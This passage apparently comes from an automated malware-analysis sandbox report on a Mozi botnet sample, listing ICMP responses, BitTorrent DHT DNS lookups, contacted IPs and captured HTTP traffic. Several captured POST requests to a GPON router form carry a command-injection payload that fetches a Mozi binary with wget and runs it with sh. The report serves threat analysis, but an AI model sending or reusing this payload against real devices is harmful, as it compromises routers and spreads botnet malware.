                                                                                                                        Apr 25, 2021 20:59:42.051318884 CEST85.97.190.139192.168.2.20d3d6(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 20:59:42.051382065 CEST85.97.190.139192.168.2.20d3d6(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 20:59:42.078955889 CEST94.246.90.74192.168.2.20ea18(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 20:59:42.079015970 CEST94.246.90.74192.168.2.20ea18(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 20:59:42.079055071 CEST94.246.90.74192.168.2.20ea18(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 20:59:42.142736912 CEST69.215.137.98192.168.2.208f23(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 20:59:42.142829895 CEST69.215.137.98192.168.2.208f23(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 20:59:42.142869949 CEST69.215.137.98192.168.2.208f23(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 20:59:44.132776976 CEST50.242.148.249192.168.2.20bb77(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 20:59:45.054325104 CEST85.97.190.139192.168.2.20d3d6(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 20:59:46.185715914 CEST202.54.6.76192.168.2.206210(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 20:59:46.267891884 CEST152.255.134.214192.168.2.20eee2(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 20:59:49.080137968 CEST149.14.241.170192.168.2.20858(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 20:59:49.080184937 CEST149.14.241.170192.168.2.20858(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 20:59:49.080202103 CEST149.14.241.170192.168.2.20858(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 20:59:52.259170055 CEST181.88.164.5192.168.2.20ad3(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 20:59:53.869487047 CEST94.190.193.34192.168.2.20b9f2(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 20:59:57.525331020 CEST124.75.149.185192.168.2.209f66(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:00.015224934 CEST95.248.151.214192.168.2.204808(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:00.026281118 CEST92.73.215.131192.168.2.2095b6(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:00.121412992 CEST172.101.203.193192.168.2.203805(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:00.274250984 CEST103.105.215.18192.168.2.20fd90(Net unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:01.017827034 CEST81.228.85.109192.168.2.2087fd(Net unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:03.055893898 CEST91.190.192.194192.168.2.20bb45(Net unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:04.237092018 CEST80.81.64.226192.168.2.2064f2(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:04.237137079 CEST80.81.64.226192.168.2.2064f2(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:07.101648092 CEST128.5.0.2192.168.2.2033eb(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 21:00:07.239912987 CEST80.81.64.226192.168.2.2064f2(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:07.979027033 CEST149.11.89.129192.168.2.20f437(Net unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:14.210403919 CEST216.241.0.1192.168.2.20a064(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 21:00:14.226023912 CEST154.85.133.197192.168.2.20dffb(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:14.332828999 CEST46.91.195.37192.168.2.207cfd(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:14.649447918 CEST84.226.148.46192.168.2.20e414(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:17.260432005 CEST201.179.31.173192.168.2.20a94a(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:17.264621973 CEST201.179.31.173192.168.2.20a94a(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:17.267051935 CEST201.179.31.173192.168.2.20a94a(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:20.220777988 CEST112.188.108.38192.168.2.20dc58(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:21.068280935 CEST62.162.61.218192.168.2.2055b4(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 21:00:21.233273983 CEST113.131.128.13192.168.2.20b876(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:21.372390032 CEST4.14.78.162192.168.2.20520d(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:24.053623915 CEST81.228.84.85192.168.2.201ade(Net unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:25.724014997 CEST82.142.138.154192.168.2.20ecdf(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:27.154347897 CEST24.30.172.166192.168.2.20f605(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:29.091592073 CEST68.87.208.178192.168.2.201e7d(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:31.228904963 CEST112.189.50.34192.168.2.20f479(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:35.002234936 CEST77.56.7.184192.168.2.2014da(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:35.246262074 CEST211.231.190.194192.168.2.207aa7(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 21:00:38.077950001 CEST197.50.187.242192.168.2.202344(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:38.078444958 CEST197.50.187.242192.168.2.202344(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:38.080207109 CEST197.50.187.242192.168.2.202344(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:42.433770895 CEST4.26.32.97192.168.2.20e465(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:42.433815002 CEST4.26.32.97192.168.2.20e465(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:42.433952093 CEST4.26.32.97192.168.2.20e465(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:45.219127893 CEST202.4.124.214192.168.2.204a69(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:53.007618904 CEST81.21.200.33192.168.2.20d992(Net unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:55.992046118 CEST79.208.169.116192.168.2.20382e(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:56.093609095 CEST24.89.194.122192.168.2.209ab1(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:00:57.074129105 CEST10.115.56.77192.168.2.20fc1c(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:03.597137928 CEST219.143.103.106192.168.2.203b3f(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 21:01:06.004230022 CEST83.168.243.154192.168.2.20d41d(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:06.144081116 CEST103.111.192.23192.168.2.20eac9(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:06.144134045 CEST103.111.192.23192.168.2.20eac9(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:06.240355968 CEST41.197.4.18192.168.2.20a98b(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 21:01:09.142400026 CEST103.111.192.23192.168.2.20eac9(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:09.999567032 CEST82.135.69.230192.168.2.20d943(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:10.119604111 CEST167.142.21.179192.168.2.201ea2(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:10.153289080 CEST50.65.30.97192.168.2.20108a(Port unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:13.250933886 CEST199.115.56.53192.168.2.20c333(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:13.250977039 CEST199.115.56.53192.168.2.20c333(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:13.251002073 CEST199.115.56.53192.168.2.20c333(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:14.120372057 CEST162.144.240.107192.168.2.20a9af(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:14.120414972 CEST162.144.240.107192.168.2.20a9af(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:17.054951906 CEST84.17.32.179192.168.2.20ca82(Net unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:17.120274067 CEST162.144.240.107192.168.2.20a9af(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:17.156553030 CEST64.59.147.242192.168.2.209240(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:20.214379072 CEST202.150.223.106192.168.2.201aed(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:20.214458942 CEST202.150.223.106192.168.2.201aed(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:21.983397961 CEST188.126.172.52192.168.2.20b680(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:23.214334011 CEST202.150.223.106192.168.2.201aed(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:24.004183054 CEST77.9.65.166192.168.2.203357(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:24.073255062 CEST91.97.108.253192.168.2.201801(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:24.115828037 CEST190.5.88.118192.168.2.205fa3(Net unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:26.983022928 CEST149.11.89.129192.168.2.20f3ca(Net unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:27.084110975 CEST67.204.13.138192.168.2.201e55(Net unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:30.992923021 CEST83.85.190.66192.168.2.20d181(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:31.078519106 CEST207.190.193.72192.168.2.20873c(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 21:01:34.042186022 CEST10.255.255.1192.168.2.2051e3(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 21:01:34.311536074 CEST10.200.30.1192.168.2.20c2de(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:34.311563015 CEST10.200.30.1192.168.2.20c2de(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:34.311573982 CEST10.200.30.1192.168.2.20c2de(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:34.999284983 CEST95.128.48.59192.168.2.20c642(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:34.999321938 CEST95.128.48.59192.168.2.20c642(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:34.999339104 CEST95.128.48.59192.168.2.20c642(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:38.006823063 CEST81.173.167.44192.168.2.2072e(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:41.045861006 CEST212.156.201.116192.168.2.201886(Net unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:41.225814104 CEST211.35.69.174192.168.2.20e2f7(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:41.225857019 CEST211.35.69.174192.168.2.20e2f7(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:44.235810041 CEST211.35.69.174192.168.2.20e2f7(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:44.980122089 CEST87.144.72.42192.168.2.205034(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:44.985433102 CEST188.105.63.155192.168.2.20fc2e(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:45.111541986 CEST162.144.240.39192.168.2.204a73(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:45.111557007 CEST162.144.240.39192.168.2.204a73(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:45.502289057 CEST189.90.245.50192.168.2.20320(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 21:01:48.098963022 CEST10.140.8.54192.168.2.20a921(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:48.099231958 CEST10.140.8.54192.168.2.20a921(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:48.111040115 CEST162.144.240.39192.168.2.204a73(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:48.159696102 CEST184.104.216.34192.168.2.202910(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 21:01:48.187864065 CEST196.0.1.217192.168.2.201146(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 21:01:51.108861923 CEST10.140.8.54192.168.2.20a921(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:51.995963097 CEST95.33.211.220192.168.2.2046a4(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:57.084892988 CEST185.30.15.82192.168.2.20b0a0(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 21:01:59.062647104 CEST50.220.200.185192.168.2.209f47(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:01:59.196429014 CEST10.250.1.233192.168.2.203dbd(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 21:02:02.049693108 CEST79.132.207.82192.168.2.20df6c(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:02.049747944 CEST79.132.207.82192.168.2.20df6c(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:02.623605967 CEST92.244.96.20192.168.2.20935a(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:04.125296116 CEST130.254.252.50192.168.2.20ba00(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 21:02:05.047369957 CEST79.132.207.82192.168.2.20df6c(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:05.217701912 CEST177.87.147.190192.168.2.2081a(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:05.217751026 CEST177.87.147.190192.168.2.2081a(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:08.216922998 CEST177.87.147.190192.168.2.2081a(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:09.278458118 CEST148.182.27.67192.168.2.202f9c(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 21:02:10.282130003 CEST148.182.27.67192.168.2.202f9c(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 21:02:12.280416965 CEST148.182.27.67192.168.2.202f9c(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 21:02:12.985212088 CEST84.23.252.43192.168.2.20487a(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:13.128887892 CEST104.158.23.10192.168.2.208190(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:24.752115965 CEST133.72.221.62192.168.2.20e6a4(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:24.752166033 CEST133.72.221.62192.168.2.20e6a4(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:24.752191067 CEST133.72.221.62192.168.2.20e6a4(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:26.150620937 CEST193.106.112.197192.168.2.20d1db(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 21:02:30.060164928 CEST149.104.34.37192.168.2.20776e(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:32.107275009 CEST128.233.16.2192.168.2.20ad1d(Net unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:34.124473095 CEST207.80.111.129192.168.2.20dc(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 21:02:36.978607893 CEST91.57.107.2192.168.2.20c202(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:37.059786081 CEST78.188.172.72192.168.2.20baee(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:37.061247110 CEST78.188.172.72192.168.2.20baee(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:37.062282085 CEST78.188.172.72192.168.2.20baee(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:37.245280981 CEST153.126.135.194192.168.2.20e121(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:40.067658901 CEST12.86.66.178192.168.2.20879e(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:40.067687035 CEST12.86.66.178192.168.2.20879e(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:40.985795021 CEST86.79.158.149192.168.2.20156e(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:40.995546103 CEST81.19.132.11192.168.2.209506(Port unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:42.449282885 CEST74.128.5.50192.168.2.20c9d2(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:43.071814060 CEST12.86.66.178192.168.2.20879e(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:44.249949932 CEST118.23.54.58192.168.2.20e6a8(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:45.166822910 CEST178.8.127.178192.168.2.20b100(Unknown)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:51.205073118 CEST118.174.219.254192.168.2.20c3de(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:51.205125093 CEST118.174.219.254192.168.2.20c3de(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:53.411910057 CEST93.124.251.100192.168.2.20365e(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:53.411971092 CEST93.124.251.100192.168.2.20365e(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:54.204802036 CEST118.174.219.254192.168.2.20c3de(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:54.967204094 CEST81.210.132.145192.168.2.20a73(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:55.106570005 CEST205.158.53.46192.168.2.20351b(Time to live exceeded in transit)Time Exceeded
                                                                                                                        Apr 25, 2021 21:02:56.481503010 CEST93.124.251.100192.168.2.20365e(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:59.044363022 CEST62.59.216.25192.168.2.202d92(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:59.044404984 CEST62.59.216.25192.168.2.202e8c(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:59.044430017 CEST62.59.216.25192.168.2.203081(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:59.445735931 CEST159.20.31.42192.168.2.20786e(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:59.445792913 CEST159.20.31.42192.168.2.20786e(Host unreachable)Destination Unreachable
                                                                                                                        Apr 25, 2021 21:02:59.445817947 CEST159.20.31.42192.168.2.20786e(Host unreachable)Destination Unreachable

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                        Apr 25, 2021 20:59:09.420084000 CEST192.168.2.208.8.8.80x2Standard query (0)dht.transmissionbt.comA (IP address)IN (0x0001)
                                                                                                                        Apr 25, 2021 20:59:09.486974001 CEST192.168.2.208.8.8.80x3Standard query (0)router.bittorrent.comA (IP address)IN (0x0001)
                                                                                                                        Apr 25, 2021 20:59:09.537425041 CEST192.168.2.208.8.8.80x4Standard query (0)router.utorrent.comA (IP address)IN (0x0001)
                                                                                                                        Apr 25, 2021 20:59:09.588736057 CEST192.168.2.208.8.8.80x5Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                        Apr 25, 2021 20:59:09.482212067 CEST8.8.8.8192.168.2.200x2No error (0)dht.transmissionbt.com87.98.162.88A (IP address)IN (0x0001)
                                                                                                                        Apr 25, 2021 20:59:09.482212067 CEST8.8.8.8192.168.2.200x2No error (0)dht.transmissionbt.com212.129.33.59A (IP address)IN (0x0001)
                                                                                                                        Apr 25, 2021 20:59:09.535651922 CEST8.8.8.8192.168.2.200x3No error (0)router.bittorrent.com67.215.246.10A (IP address)IN (0x0001)
                                                                                                                        Apr 25, 2021 20:59:09.586877108 CEST8.8.8.8192.168.2.200x4No error (0)router.utorrent.com82.221.103.244A (IP address)IN (0x0001)
                                                                                                                        Apr 25, 2021 20:59:09.640337944 CEST8.8.8.8192.168.2.200x5No error (0)bttracker.debian.orgbttracker.acc.umu.seCNAME (Canonical name)IN (0x0001)
                                                                                                                        Apr 25, 2021 20:59:09.640337944 CEST8.8.8.8192.168.2.200x5No error (0)bttracker.acc.umu.se130.239.18.159A (IP address)IN (0x0001)

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • 127.0.0.1:80
                                                                                                                        • 13.226.101.83:80
                                                                                                                        • 99.192.234.217:80
                                                                                                                        • 154.201.250.66:80
                                                                                                                        • 185.29.123.11:80
                                                                                                                        • 217.182.243.67:80
                                                                                                                        • 127.0.0.1:5555
                                                                                                                        • 45.65.120.55:80
                                                                                                                        • 35.244.243.215:80
                                                                                                                        • 23.207.67.88:80
                                                                                                                        • 146.158.12.4:80
                                                                                                                        • 23.217.112.105:80
                                                                                                                        • 168.184.43.22:37215
                                                                                                                        • 127.0.0.1:8080
                                                                                                                        • 157.245.223.131:80
                                                                                                                        • 23.76.236.93:80
                                                                                                                        • 81.7.8.12:80
                                                                                                                        • 79.171.18.106:80
                                                                                                                        • 166.88.243.237:80
                                                                                                                        • 18.228.54.139:80
                                                                                                                        • 23.40.37.31:80
                                                                                                                        • 154.90.79.101:80
                                                                                                                        • 133.137.248.191:80

                                                                                                                        HTTP Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        0192.168.2.20566503.22.215.25180
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 20:59:02.203218937 CEST92OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                        Host: 127.0.0.1:80
                                                                                                                        Connection: keep-alive
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Hello, World
                                                                                                                        Content-Length: 118
                                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                        Apr 25, 2021 20:59:07.403970003 CEST124INHTTP/1.1 404 Not Found
                                                                                                                        Date: Sun, 25 Apr 2021 18:59:02 GMT
                                                                                                                        Server: Apache/2.4.41 ()
                                                                                                                        Content-Length: 196
                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        1192.168.2.2040516164.100.92.1280
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 20:59:04.284216881 CEST103OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                        Host: 127.0.0.1:80
                                                                                                                        Connection: keep-alive
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Hello, World
                                                                                                                        Content-Length: 118
                                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                        Apr 25, 2021 20:59:04.840377092 CEST103OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                        Host: 127.0.0.1:80
                                                                                                                        Connection: keep-alive
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Hello, World
                                                                                                                        Content-Length: 118
                                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                        Apr 25, 2021 20:59:05.556113005 CEST113OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                        Host: 127.0.0.1:80
                                                                                                                        Connection: keep-alive
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Hello, World
                                                                                                                        Content-Length: 118
